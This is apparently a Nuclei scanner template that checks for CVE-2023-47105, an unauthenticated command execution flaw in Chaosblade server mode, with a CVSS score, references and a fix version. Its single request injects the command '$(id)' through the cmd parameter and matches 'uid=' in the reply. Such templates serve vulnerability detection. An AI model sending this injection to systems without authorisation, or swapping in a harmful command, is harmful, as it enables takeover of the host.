43 lines
1.7 KiB
YAML
id: CVE-2023-47105

info:
  name: Chaosblade < 1.7.4 - Remote Code Execution
  author: s4e-io
  severity: high
  description: |
    exec.CommandContext in Chaosblade 0.3 through 1.7.3, when server mode is used, allows OS command execution via the cmd parameter without authentication.
  impact: |
    This vulnerability allows unauthenticated attackers to remotely invoke the HTTP service and execute arbitrary commands on any Chaosblade instance with server mode enabled. This could lead to unauthorized access and control over the host system running Chaosblade.
  remediation: Fixed in 1.7.4
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-47105
    - https://github.com/advisories/GHSA-723h-x37g-f8qm
    - https://github.com/chaosblade-io/chaosblade/blob/0a07380c9899febb2b544132783b376b44226cca/exec/os/executor.go#L68
    - https://narrow-oatmeal-0c0.notion.site/ChaosBlade-Remote-Command-Execution-CVE-2023-47105-4f5459046488436caaec2bced6ff26d7
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L
    cvss-score: 8.6
    cve-id: CVE-2023-47105
    cwe-id: CWE-78
    epss-score: 0.00043
    epss-percentile: 0.10253
  metadata:
    verified: true
    max-request: 1
    vendor: chaosblade-io
    product: chaosblade
  tags: cve,cve2023,chaosblade,rce

http:
  - raw:
      - |
        GET /chaosblade?cmd=$(id) HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"uid=", "code", "success\":false", "error")'
          - 'status_code == 200'
        condition: and
# digest: 490a0046304402203e17488a86905dddf0bd9a91fdcb02e9058c0a9bc597d69564c0fb701eb09594022046d7d1a057223f0654a28939940c300bc9a03c0838d0b6942dfd242e28d68c98:922c64590222798bb761d5b6d8e72950